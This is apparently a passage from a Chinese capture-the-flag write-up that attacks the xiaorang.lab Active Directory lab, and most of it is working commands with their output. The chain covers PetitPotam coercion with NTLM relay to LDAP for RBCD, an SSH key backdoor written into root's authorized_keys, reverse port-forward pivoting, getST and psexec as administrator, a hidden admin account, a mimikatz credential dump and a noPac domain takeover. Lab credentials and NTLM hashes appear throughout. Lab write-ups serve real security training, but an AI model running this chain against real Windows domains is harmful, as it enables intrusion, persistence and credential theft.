SMB         172.22.11.45    445    XR-DESKTOP       [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-DESKTOP) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.45:445  ...  OK
 ...  OK
SMB         172.22.11.6     445    XIAORANG-DC      [*] Windows 10.0 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB         172.22.11.26    445    XR-LCM3AE8B      [*] Windows 10.0 Build 18362 x64 (name:XR-LCM3AE8B) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.11.45    445    XR-DESKTOP       [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:445 [proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.102:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:445  ...  OK
SMB         172.22.11.6     445    XIAORANG-DC      [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.26:445 [proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.103:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.26:445  ...  OK
SMB         172.22.11.26    445    XR-LCM3AE8B      [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
WEBDAV      172.22.11.26    445    XR-LCM3AE8B      WebClient Service enabled on: 172.22.11.26    



proxychains ./cme smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam

SMB         172.22.11.45    445    XR-DESKTOP       [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-DESKTOP) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.45:445  ...  OK
 ...  OK
 ...  OK
SMB         172.22.11.26    445    XR-LCM3AE8B      [*] Windows 10.0 Build 18362 x64 (name:XR-LCM3AE8B) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB         172.22.11.6     445    XIAORANG-DC      [*] Windows 10.0 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:False)
SMB         172.22.11.45    445    XR-DESKTOP       [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
[proxychains] Strict chain  ...  127.0.0.1:55556 [proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.26:445  ...  172.22.11.45:445  ...  OK
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.26:445  ...  OK
PETITPOT... 172.22.11.45    445    XR-DESKTOP       VULNERABLE
PETITPOT... 172.22.11.45    445    XR-DESKTOP       Next step: https://github.com/topotam/PetitPotam                                                                        
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.102:445 SMB         172.22.11.26    445    XR-LCM3AE8B      [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
[proxychains] Strict chain  ...  127.0.0.1:55556 [proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:445  ...  172.22.11.26:445  ...  OK
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:445  ...  OK
PETITPOT... 172.22.11.26    445    XR-LCM3AE8B      VULNERABLE
PETITPOT... 172.22.11.26    445    XR-LCM3AE8B      Next step: https://github.com/topotam/PetitPotam                                                                        
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.103:445 SMB         172.22.11.6     445    XIAORANG-DC      [+] xiaorang.lab\yangmei:xrihGHgoNZQ 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:445  ...  OK
PETITPOT... 172.22.11.6     445    XIAORANG-DC      VULNERABLE
PETITPOT... 172.22.11.6     445    XIAORANG-DC      Next step: https://github.com/topotam/PetitPotam

无ADCS + Petitpotam + ntlm中继打法
攻击链：用petitpotam触发存在漏洞且开启了webclient服务的目标，利用petitpotam触发目标访问我们的http中继服务，目标将会使用webclient携带ntlm认证访问我们的中继，并且将其认证中继到ldap，获取到机器账户的身份，以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性，允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)

满足条件，目标机器需要开启webclient服务
WebClient扫描，确定只能拿下 172.22.11.26 (XR-LCM3AE8B)

根据题目描述，那么这里应该是要用到WEBDAV + PetitPotam的强制认证，简单的说就是要求我们用PetitPotam强制目标主机使用LM Hash、NTLM Hash对我们的服务器进行认证，此时我们可以通过该认证中继到其他目标服务器，以此达到横向的目的。

参考了大师傅们的博客，发现这里使用的是无ADCS + PetitPotam + NTLM中继打法，思路大概如下

1、用petitpotam触发目标访问HTTP服务
2、目标使用webclient携带NTLM认证访问中继，并将NTLM认证中继到LDAP
3、获取到机器账号身份
4、以机器账户的身份修改其自身的msDS-AllowedToActOnBehalfOfOtherIdentity属性，从而允许我们访问到目标机器。

中继环境配置

我们需要把服务器的80端口，转发到客户端本地的80端口。

因此先配置下密钥，写下后门。

中继攻击前言：
- 实战中的中继打法只需要停掉80占用服务，开启端口转发（portfwd，CS在后续版本中添加了rportfwd_local，直接转发到客户端本地）
- 本次演示类似实战的打法，不选择把impacket丢到入口ubuntu上面这种操作

中继攻击环境配置: 端口转发 + 代理
我们目前需要把服务器的80，转发到客户端本地的80

注意：由于SSH的反向端口转发监听的时候只会监听127.0.0.1，所以这时候需要点技巧
如图所示，即使反向端口转发79端口指定监听全部 (-R *:79:127.0.0.1:80)，端口79依旧绑定在了127.0.0.1（图中顺便把socks5代理也开了）
加多一条socat，让流量 0.0.0.0:80 转发到 127.0.0.1:79，再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0

习惯把公私钥写在当前目录下

攻击机
ssh-keygen -t rsa -b 4096 -f ./rsa_key
cat ./rsa_key.pub

靶机
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDp6Vu3BloMxQiJi67aQfwF7tmMyza1XPX8A9Nsvsh+wXx851ffay9e+gW9Lzjs24TbVcDb5ED42EDSXtLKlRt1tS+HGnO7hvfpGg1dm4xjUWn3+HHjoPFtEiE2NfMDQu3xJ4aMkSd9nbdTujVbk3QuI7lvCuU6LGEXV4tl8iM7tfqCQ+EaUwHQ0D2wYsxmcmcyeEcpOpbzBeQnNdQa2lunIFUNpZlDTLMxiqHoUoHeivNXXEjuWyCbDziqHxClqWGjR+RSVV20TRDVPfazZHn2QL/YwbUq9cjU5wg1rAFd8hFxZTdx2Bid4GYG/gctQ0sURQ9xRLzmq2lFy2aRZzVwP4aOWU+kEf1OJlhfuAhlatnEEOyZ8Cl+sqZQVMlxmrpDO3/v/UYA8uyVUoLsUOTg0UNDBc5J+v9S9DYJDdodgwU4sR8YrMDjy+qVtz5ZUUYxF+/VXhaC83okttiWonZykPWE0O4lUxq/jkZd+QSgm/c6wTb5y5EmLeO2zh+MBjaqgf+lU9uMvqgRIvLj2YOC0I/fsiDOhg2eq+cjDNSjKai2KCvGBdciIj1qjqjdGkGRjcxkdA6rO3G/2Wh75KCOsruyG3UoTvAaDE5Jo0UVzzq63nRj71oICzU5MFFrsLaFfT0RfSeYzwAo6nhK+mLQVWjmSpve4Cj0U2O+u/v9ww== matrix@matrix" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

连ssh：

先用ssh把远程主机（39.99.132.128）上的 79 端口流量，通过 ssh 通道，转发到你本地的 80 端口。再让远程主机（39.99.132.128）监听 80 端口（0.0.0.0:80），收到的流量再转发到远程主机本机的 79 端口。

本质上就是实现了访问远程主机80的话，转发到79端口，再转发回攻击机80端口；外部访问远程主机 80 端口 = 访问你的本地 80 端口

1 2	`ssh -i ./rsa_key root@39.99.132.128 -D 127.0.0.1:55556 -R \*:79:127.0.0.1:80 nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &`

默认情况下, WebClient 仅对本地内部网 (Local Intranet) 或受信任的站点 (Trusted Sites) 列表中的目标自动使用当前用户凭据进行 NTLM 认证

在76机子用socat进行端口转发，转发到vps上，然后再从vps上转发到kali的80端口（大概是这个流程

可以看到这里流量已经成功转发，curl 172.22.11.76的流量转发到了我们本地kali

1 2	`nc -lvvp 80 proxychains curl http://172.22.11.76:80`

注意：

前面提到，没有ldaps，所以不能使用addcomputer
同时在使用proxychains后，ldap://后面只能接dc的ip
利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD

接着本地开启开启ntlmrelayx，利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD，接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76

接下来本地开启ntlmrelayx，利用前面抓到的XR-Desktop作为恶意账户设置RBCD

10-4-1024x390

proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
proxychains ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access

proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.22.11.6
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.6:389  ...  OK
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Authenticating against ldap://172.22.11.6 as XIAORANG/XR-LCM3AE8B$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] HTTPD(80): Client requested path: /webdav/pipe/srvsvc
[*] All targets processed!
[*] HTTPD(80): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] xr-desktop$ can now impersonate users on XR-LCM3AE8B$ via S4U2Proxy
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /

接着使用PetitPotam触发XR-LCM3AE8B强制认证到172.22.11.26

利用PetitPotam漏洞让26机器强制访问76机器

这里中继的作用其实就是修改了机器账户的msDS-AllowedToActOnBehalfOfOtherIdentity

可以看到，已经完成RBCD攻击了，接下来就是直接申请XR-LCM3AE8B的银票了

proxychains python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
proxychains python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/home/matrix/Desktop/PetitPotam/PetitPotam.py:23: SyntaxWarning: invalid escape sequence '\ '
  | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:172.22.11.26[\PIPE\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.11.26:445  ...  OK
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

此时可以看到已经成功获取了认证

接下来用之前抓的机器账户XR-DESKTOP$去打172.22.11.26的RBCD

1	`proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :738dcc0171b84e1a36400008983a3e10 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6`

接下来配置下

1	`export KRB5CCNAME=administrator.ccache`

把172.22.11.26 XIAORANG\XR-LCM3AE8B加到/etc/hosts里（这里看情况，加不加都行）后psexec无密码连接

1
2
3

sudo vim /etc/hosts
#填入内容如下
172.22.11.26XR-LCM3AE8B.xiaorang.lab

而后登录即可

proxychains impacket-psexec xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk


C:\windows\system32> type C:\users\administrator\flag\flag03.txt
   ___     _ __                      __     _              __ _  
  / __|   | '_ \   ___     ___      / _|   (_)    _ _     / _` | 
  \__ \   | .__/  / _ \   / _ \    |  _|   | |   | ' \    \__, | 
  |___/   |_|__   \___/   \___/   _|_|_   _|_|_  |_||_|   |___/  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

flag03: flag{86d51603-a217-4a08-869d-1ff6d9486157}

flag4

noPac

添加用户

1 2	`net user matrix$ Matrix2025! /add net localgroup administrators matrix$ /add`

RPD连接

1	`proxychains xfreerdp3 /u:matrix$ /p:'Matrix2025!' /v:172.22.11.26 /cert:ignore`

RDP登录后上传Mimikatz，抓取密码

得到一个域内用户zhanghui

PS C:\Users\matrix$\Desktop> ./mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
。。。
Authentication Id : 0 ; 744772 (00000000:000b5d44)
Session           : RemoteInteractive from 2
User Name         : zhanghui
Domain            : XIAORANG
Logon Server      : XIAORANG-DC
Logon Time        : 2024/1/22 11:27:21
SID               : S-1-5-21-3598443049-773813974-2432140268-1133
    msv :
     [00000003] Primary
     * Username : zhanghui
     * Domain   : XIAORANG
     * NTLM     : 1232126b24cdf8c9bd2f788a9d7c7ed1

题目描述中提到了noPac，搜索发现这篇文章https://xz.aliyun.com/t/10694

工具：https://github.com/Ridter/noPac

漏洞原理大致如下

1
2
3

1、我们创建了与DC机器账户名字相同的机器账号(不以$结尾，与CVE-2021-42278结合，此时AD未对域内机器用户名做验证)
2、账户请求TGT后，更改账户名字，通过S4U2Self申请TGS 票据
3、DC在TGS_REP阶段，这个账户不存在，DC用自己的密钥加密TGS 票据，提供一个属于该账号的PAC，此时得到一个高权限的ST

大致了解了原理，我们接下来进行实践

使用刚刚抓到的账号尝试攻击

proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell

C:\windows\system32>type C:\users\administrator\flag\flag04.txt
8""""8                                       
8      eeeee eeeee eeeee eeee e  eeeee eeeee 
8eeeee 8   8 8  88 8  88 8    8  8   8 8   8 
    88 8eee8 8   8 8   8 8eee 8e 8e  8 8e    
e   88 88    8   8 8   8 88   88 88  8 88 "8 
8eee88 88    8eee8 8eee8 88   88 88  8 88ee8 

You successfully got the last flag.

flag04: flag{39ac82df-e49e-4ca1-80b9-35981880625d}